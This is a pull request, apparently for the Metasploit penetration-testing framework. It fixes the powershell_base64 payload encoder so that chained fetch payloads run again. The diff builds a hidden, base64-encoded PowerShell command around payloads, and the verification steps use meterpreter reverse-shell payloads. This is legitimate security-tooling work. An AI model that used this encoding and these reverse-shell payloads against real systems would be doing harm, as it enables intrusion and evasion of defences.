### PR TITLE
Fix the powershell_base64 encoder

### DIFF
--- a/lib/msf/core/post/windows.rb
+++ b/lib/msf/core/post/windows.rb
@@ -16,7 +16,10 @@ module Msf::Post::Windows
     string
   end
 
-  # Escape a string literal value to be included as an argument to powershell.exe.
+  # Escape a string literal value to be included as an argument to powershell.exe. The escaped value *should be* placed
+  # within single quotes which is a Powershell verbatim string. See:
+  # https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_quoting_rules?view=powershell-7.4#single-quoted-strings
+  #
   # This will help in cases where one might need to use & as in PowerShell this is
   # a reserved character whereas in cmd.exe this is used to indicate the start
   # of an additional command to execute.

--- a/modules/encoders/cmd/powershell_base64.rb
+++ b/modules/encoders/cmd/powershell_base64.rb
@@ -22,7 +22,6 @@ class MetasploitModule < Msf::Encoder
   # Encodes the payload
   #
   def encode_block(state, buf)
-
     # Skip encoding for empty badchars
     if state.badchars.length == 0
       return buf
@@ -45,18 +44,7 @@ class MetasploitModule < Msf::Encoder
   end
 
   def encode_buf(buf)
-    # From https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_quoting_rules?view=powershell-7.3
-    # To include a single quotation mark in a single-quoted string, use a second consecutive single quote. For example:
-    # 'don''t' would be the string "don't" but using single quotes.
-    #
-    # Note that we can't use double quotes here as double quote strings in PowerShell are classed as expandable strings
-    # and we don't want expansion here, as this might cause any potential elements starting with $ to be interpreted
-    # as a variable within the string to be replaced by that variable's value.
-    #
-    # The use of quotes also ensures that we get around the issue with cmd.exe understanding & as a symbol for
-    # "also execute this command", whereas in PowerShell it is a reserved character, so not quoting the string
-    # will result in the & being interpreted by PowerShell and the command failing on an interpretation error in PowerShell itself.
-    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c 'start #{Msf::Post::Windows.escape_powershell_literal(buf)} '"))
+    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c '#{Msf::Post::Windows.escape_powershell_literal(buf)}'"))
     cmd = "powershell -w hidden -nop -e #{base64}"
   end
 end


### PR DESCRIPTION
This reverts the changes in 39be214413504bd9bd6fb351d65ad6554ee3124f, switching it back to not using `start`. When using `start`, the argument can not be a string of commands joined by `&` which is required by the fetch payloads. The single quotes need to be kept as they are so the string is treated as a Powershell verbatim string. This should fix the powershell-related issues that were called out in #19249.

## Verification

- [ ] Use a payload, e.g. `cmd/windows/http/x64/meterpreter/reverse_tcp`
- [ ] Set the options and start the handler
- [ ] Generate it using the powershell_base64 encoder by specifying bad characters, run: `generate -f raw -b '.'`
- [ ] Run the payload and see that it works

I tested the following 4 payloads, all of which work both before and after except `cmd/windows/http/x64/meterpreter/reverse_tcp` which coincidentally is the only one that chains multiple commands together.

* cmd/windows/powershell/meterpreter/reverse_tcp
* cmd/windows/http/x64/meterpreter/reverse_tcp
* cmd/windows/generic CMD="ping 192.168.159.128"
* cmd/windows/smb/x64/meterpreter/reverse_tcpk
